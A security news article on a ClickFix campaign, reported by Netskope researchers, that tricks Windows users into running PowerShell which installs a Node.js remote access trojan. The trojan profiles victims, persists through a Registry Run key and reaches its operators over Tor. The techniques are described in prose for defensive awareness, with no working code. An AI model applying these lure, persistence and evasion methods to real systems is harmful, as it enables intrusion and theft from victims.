Cybercriminals Exploit ClickFix Tactics to Deploy Node.js-Based RAT via Tor
A new cyberattack campaign is targeting Windows users through a deceptive technique known as ClickFix. Attackers present fake browser verification pages to trick individuals into executing hidden commands that install a Node.js-based Remote Access Trojan (RAT) on their systems. This malware then communicates with its operators via the Tor network, effectively concealing its traffic and making it challenging to trace or disrupt the attacker’s infrastructure.
Understanding ClickFix Attacks
ClickFix is a social engineering method that emerged prominently in early 2025. It involves displaying counterfeit CAPTCHA or identity verification pages that instruct users to manually copy and execute commands from their clipboard. In this latest campaign, the command runs a base64-encoded PowerShell script, which downloads a malicious installer file named `NodeServer-Setup-Full.msi` from a fraudulent domain. This installer operates silently in the background, avoiding any visible prompts that might alert the user.
Technical Breakdown of the Attack
Researchers at Netskope Threat Labs have identified and tracked this campaign, noting its sophistication compared to earlier ClickFix operations. The attack unfolds as follows:
1. Deceptive Prompt: The user encounters a fake verification page that appears legitimate.
2. Clipboard Manipulation: The page instructs the user to copy a command to their clipboard.
3. Command Execution: The user is guided to paste and execute the command via the Windows Run dialog (Win+R).
4. Payload Delivery: Executing the command runs a PowerShell script that downloads and installs the malicious `NodeServer-Setup-Full.msi` file.
This method effectively bypasses traditional security measures by leveraging user interaction and trusted system utilities.
Characteristics of the Node.js-Based RAT
The deployed RAT is built on a modular Node.js framework, allowing it to load various capabilities directly into memory. This design means that the most dangerous functionalities are never written to the victim’s hard drive, enabling the malware to evade traditional security scans.
Malware-as-a-Service Infrastructure
A notable aspect of this campaign is the underlying Malware-as-a-Service (MaaS) platform. An operational security oversight by the attackers exposed the server-side admin panel, revealing features such as:
– Cryptocurrency Wallet Tracking: Monitoring and managing stolen cryptocurrency assets.
– Operator Management: Implementing role-based access controls for multiple operators.
– Custom Module Deployment: Pushing tailored modules to infected machines.
– Real-Time Alerts: Sending instant notifications via Telegram when new victims connect.
This infrastructure indicates a well-organized operation capable of scaling attacks efficiently.
System Profiling and Evasion Techniques
Once installed, the malware conducts thorough profiling of the compromised system, collecting data such as:
– Operating System Version: Identifying the specific OS in use.
– Hardware Details: Gathering information about the system’s hardware components.
– Geographic Location: Determining the physical location of the device.
– External IP Address: Recording the device’s public IP address.
– Security Tools Inventory: Listing active security software, including over 30 antivirus and endpoint security products like CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.
This information helps attackers assess the value of the target and tailor their approach accordingly.
Persistence and Communication Mechanisms
To maintain persistence, the malware:
– File Extraction: Extracts its files into the `%LOCALAPPDATA%\LogicOptimizer\` directory.
– Registry Modification: Adds an entry to the Windows Registry Run key, ensuring it launches automatically upon user login.
– Stealth Execution: Utilizes `conhost.exe` in headless mode to silently run Node.js, keeping the process hidden from the user.
Before establishing communication with its command-and-control (C2) server, the malware decrypts its configuration data using AES-256-CBC and XOR methods. The decryption keys are reshuffled with each execution, complicating static analysis. The decrypted configuration reveals a `.onion` Tor hidden service address as the C2 destination.
To connect to the C2 server, the malware:
1. Tor Integration: Downloads the Tor Expert Bundle from the official Tor Project website.
2. Proxy Setup: Creates a local SOCKS5 proxy on the infected machine.
3. Secure Communication: Establishes a connection using gRPC, a streaming protocol that allows real-time, bidirectional communication.
This use of the Tor network effectively anonymizes the communication, making it difficult to trace or block.
Implications and Recommendations
The sophistication of this campaign underscores the evolving nature of cyber threats. By combining social engineering with advanced evasion techniques, attackers can bypass traditional security measures and maintain prolonged access to compromised systems.
Recommendations for Users and Organizations:
– User Education: Train users to recognize and avoid suspicious prompts, especially those instructing manual command execution.
– Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating fileless malware.
– Network Monitoring: Implement network monitoring tools to detect unusual outbound connections, particularly those involving the Tor network.
– Regular Updates: Keep all software and security tools updated to protect against known vulnerabilities.
By adopting a multi-layered security approach and fostering a culture of vigilance, organizations can better defend against such sophisticated attacks.
